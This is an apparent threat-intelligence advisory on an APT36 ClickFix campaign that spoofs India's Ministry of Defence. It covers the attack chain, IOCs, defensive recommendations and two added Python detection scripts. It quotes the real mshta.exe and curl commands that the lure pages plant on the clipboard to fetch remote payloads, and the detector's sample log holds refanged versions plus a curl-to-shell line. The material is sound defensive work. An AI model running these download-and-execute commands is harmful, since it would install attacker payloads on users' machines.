APT36 Leverages ClickFix Tactics in Targeted Campaign Against India

A recent cyber campaign spoofing the Indian Ministry of Defence has been attributed to APT36 (aka Transparent Tribe), a Pakistan-aligned threat actor. This multi-platform attack combines ClickFix-style social engineering with spoofed government websites to trick users into running commands that the lure page has silently placed on their clipboard, on both Windows and Linux systems. The campaign shows a refined use of infrastructure impersonation, with payload delivery tailored to the victim's operating system.

Severity Level: High

ATTACK CHAIN:

  1. Reconnaissance & Infrastructure Setup:
    • Mimicry of legitimate Indian government portals (e.g., Ministry of Defence press releases).
    • Web content cloned using HTTrack (the tool's banner is left behind in the page source).
  2. Initial Access:
    • Victims visit the cloned press release portal.
  3. Delivery Mechanism:
    • The site redirects to /captcha/windows.php or /captcha/linux.php based on the visitor's operating system.
    • Linux flow: a fake CAPTCHA with an “I’m not a rebot” [sic] button. Clicking it silently copies this command to the clipboard:
      curl https[:]//trade4wealth[.]in/admin/assets/js/
    • Windows flow: a fake “For Official Use Only” overlay on top of a blurred yoga.ayush.gov[.]in background. Clicking “Continue” copies this mshta.exe command to the clipboard:
      mshta.exe https[:]//trade4wealth[.]in/admin/assets/css/default/sysinte.hta
  4. Execution:
    • Linux: users are instructed to paste the copied command using keyboard shortcuts. It runs the shell script mapeal.sh, which opens a decoy image and exits.
    • Windows: running the mshta.exe command loads an obfuscated HTA payload that decodes to a .NET-based loader. The loader initiates outbound communication to IP 185.117.90[.]212 and the C2 domain email.gov.in.avtzyu[.]store. A decoy press release PDF is shown to reduce suspicion.
  5. Command & Control (C2):
    • Persistent connections are made by the obfuscated .NET loader on Windows.
    • Communication is likely over HTTP(S) to the spoofed subdomain and IP.
  6. Impact (Current State):
    • Linux: no lateral movement, persistence, or exfiltration observed.
    • Windows: loader operational; likely a modular payload system for future delivery.
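To make the first and third steps concrete: the cloning evidence the advisory refers to is the banner comment that HTTrack Website Copier writes at the top of every mirrored HTML file, and the lure pages are recognizable by the OS-based redirect and by a click handler that writes a command to the clipboard. The following Python script, added here as an example and not taken from the advisory or from the hunt.io report, triages a saved copy of a suspicious page for those three indicators. The sample HTML it runs on is constructed, and every host name in it is a placeholder.

```python
"""Triage a page suspected of impersonating a government portal.

Added example; not code from the advisory or from the hunt.io report.
Checks the page source for (1) the banner comment HTTrack writes into
every mirrored HTML file, (2) the OS-based redirect to /captcha/windows.php
or /captcha/linux.php, and (3) a click handler that writes a command to
the clipboard, which is the ClickFix tell. Sample HTML is constructed.
"""
import re

# HTTrack prefixes mirrored files with "<!-- Mirrored from <origin> by HTTrack Website Copier/<ver> ... -->".
HTTRACK_RE = re.compile(
    r"<!--\s*Mirrored from\s+(?P<origin>\S+)\s+by HTTrack Website Copier/(?P<ver>\S+)",
    re.IGNORECASE,
)
# OS-specific lure paths named in the advisory.
CAPTCHA_REDIRECT_RE = re.compile(r"/captcha/(windows|linux)\.php", re.IGNORECASE)
# The two common ways a page writes to the clipboard.
CLIPBOARD_RE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.IGNORECASE
)
# Text that looks like a command to run: mshta with a URL, or curl output piped to a shell.
PLANTED_CMD_RE = re.compile(
    r"mshta(\.exe)?\s+https?://|\bcurl\b[^|\n]*https?://[^|\n]*\|\s*(ba)?sh\b", re.IGNORECASE
)


def triage_html(html: str) -> dict:
    """Return the cloning and ClickFix indicators found in one page's source."""
    m = HTTRACK_RE.search(html)
    findings = {
        "httrack_origin": m.group("origin") if m else None,
        "httrack_version": m.group("ver") if m else None,
        "captcha_redirect": sorted({r.group(1).lower() for r in CAPTCHA_REDIRECT_RE.finditer(html)}),
        "clipboard_write": bool(CLIPBOARD_RE.search(html)),
        "planted_command": bool(PLANTED_CMD_RE.search(html)),
    }
    # A mirrored page is suspicious on its own; a clipboard write is only
    # suspicious when the text it plants looks like a command to execute.
    findings["suspicious"] = findings["httrack_origin"] is not None or (
        findings["clipboard_write"] and findings["planted_command"]
    )
    return findings


# Constructed samples; every host name below is a placeholder.
SAMPLE_CLONED_PORTAL = """<!DOCTYPE html>
<!-- Mirrored from press.example.gov.in/releases by HTTrack Website Copier/3.49-2 [XR&CO'2014], Thu, 01 May 2025 10:00:00 GMT -->
<html><head><title>Press Release</title>
<script>
  var p = navigator.userAgent.indexOf("Linux") !== -1 ? "/captcha/linux.php" : "/captcha/windows.php";
  location.href = p;
</script></head><body></body></html>"""

SAMPLE_CAPTCHA_PAGE = """<html><body>
<p>For Official Use Only</p>
<button onclick="navigator.clipboard.writeText('mshta.exe https://lure.example/stage.hta')">Continue</button>
</body></html>"""

# A legitimate "copy link" button: writes to the clipboard, but not a command.
SAMPLE_BENIGN_PAGE = """<html><body>
<button onclick="navigator.clipboard.writeText(location.href)">Copy link</button>
</body></html>"""

if __name__ == "__main__":
    for name, page in [("cloned portal", SAMPLE_CLONED_PORTAL),
                       ("captcha page", SAMPLE_CAPTCHA_PAGE),
                       ("benign page", SAMPLE_BENIGN_PAGE)]:
        print(name, triage_html(page))
```

Run it against a page saved with "view source" rather than a rendered DOM dump, since the HTTrack banner is a comment and a rendered copy may drop it. A clipboard write on its own is not an indicator; plenty of legitimate sites offer a copy button, which is why the script only raises on the combination of a clipboard write and command-like text.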

Recommendations:

  1. Enable HTTP/HTTPS inspection to detect HTA and shell script downloads.
  2. Train employees to recognize spoofed government portals and misleading CAPTCHAs.
  3. Educate users on the danger of pasting and executing commands that a web page has placed on the clipboard.
  4. Block execution of mshta.exe where it is not needed.
  5. Monitor for unauthorized use of curl, wget, and bash in user contexts.
  6. Block the IOCs at their respective controls: https://www.virustotal.com/gui/collection/3bb2347b4fdc81ad3263ce57a067a91cd7c214c1ab79720d55225de5a621f4be/iocs
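Recommendations 4, 5 and 6 translate into a process-creation detection that can run over endpoint telemetry. The script below is an added example, not code from the advisory or its sources. It scans process events in a constructed JSON-lines format (one object per line) for mshta.exe launched with a remote URL, for curl or wget output piped straight into a shell, and for the advisory's IOCs, and it separates hits from interactive user sessions from the same commands run by a service or CI job, which is the distinction recommendation 5 draws. The log lines are constructed; the one curl line that reproduces the Linux clipboard command is shown only as far as the advisory shows it, and the other hosts and URLs are placeholders.

```python
"""Process-creation detection for the ClickFix execution patterns in this advisory.

Added example, not code from the advisory or its sources. Input is one JSON
object per line with the keys id, host, user, parent, image and cmdline
(a constructed format; map your own telemetry's field names onto it).
"""
import json
import re

# Indicators published in the advisory, kept defanged in source and
# refanged at load time so they match what appears in log text.
DEFANGED_IOCS = [
    "trade4wealth[.]in",
    "email.gov.in.avtzyu[.]store",
    "185.117.90[.]212",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its matchable form."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


IOCS = [refang(i).lower() for i in DEFANGED_IOCS]

# Recommendation 4: mshta.exe handed a remote HTA rather than a local file.
MSHTA_REMOTE_RE = re.compile(r"\bmshta(\.exe)?\b[^\n]*\bhttps?://", re.IGNORECASE)
# Recommendation 5: download tool output piped straight into a shell.
DOWNLOAD_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b", re.IGNORECASE)
# Parents that indicate an interactive user session (desktop shell, Run dialog, terminal shell).
# Assumed list; extend it for the shells and launchers in your environment.
USER_PARENTS = {"explorer.exe", "bash", "zsh", "sh", "gnome-terminal-server", "konsole"}


def classify(event: dict) -> list:
    """Return the rule names that fire on one process-creation event, in a fixed order."""
    cmd = event.get("cmdline", "")
    hits = []
    if MSHTA_REMOTE_RE.search(cmd):
        hits.append("mshta_remote_hta")
    if DOWNLOAD_TO_SHELL_RE.search(cmd):
        hits.append("download_piped_to_shell")
    if any(ioc in cmd.lower() for ioc in IOCS):
        hits.append("known_ioc")
    # Tag hits that came from a user session; the same command run by a
    # service or CI runner is a different (often legitimate) story.
    if hits and event.get("parent", "").lower() in USER_PARENTS:
        hits.append("user_context")
    return hits


def scan(lines) -> list:
    """Scan JSON-lines events and return (event id, rule hits) for every event that fired."""
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        event = json.loads(raw)
        hits = classify(event)
        if hits:
            alerts.append((event["id"], hits))
    return alerts


# Constructed sample telemetry. Line l1 reproduces the Linux clipboard command
# exactly as far as the advisory shows it; the other URLs and hosts are placeholders.
SAMPLE_LOG = r"""
{"id": "w1", "host": "ws-17", "user": "analyst", "parent": "explorer.exe", "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe https://trade4wealth.in/admin/assets/css/default/sysinte.hta"}
{"id": "w2", "host": "ws-17", "user": "analyst", "parent": "explorer.exe", "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe C:\\ProgramData\\Vendor\\setup.hta"}
{"id": "l1", "host": "dev-03", "user": "dev", "parent": "bash", "image": "/usr/bin/curl", "cmdline": "curl https://trade4wealth.in/admin/assets/js/"}
{"id": "l2", "host": "ci-01", "user": "runner", "parent": "systemd", "image": "/usr/bin/curl", "cmdline": "curl -fsSL https://pkg.example.internal/install.sh | sh"}
{"id": "l3", "host": "dev-03", "user": "dev", "parent": "bash", "image": "/usr/bin/curl", "cmdline": "curl -s https://api.example.internal/health"}
{"id": "l4", "host": "dev-03", "user": "dev", "parent": "bash", "image": "/usr/bin/curl", "cmdline": "curl -s https://lure.example/stage.sh | bash"}
"""

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_LOG.splitlines()):
        print(event_id, ", ".join(hits))
```

The local-file mshta launch (w2) and the CI runner's install script (l2) show why the rules are kept separate: blocking mshta.exe outright (recommendation 4) is cleaner than alerting on it, and a curl-to-shell hit without the user-context tag is usually an automation pattern to review rather than an incident. The IOC match is the weakest signal over time, since the actor can rotate infrastructure; the behavioural rules are the ones worth keeping.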

Source:

  • https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence
  • https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/

Ampcus Cyber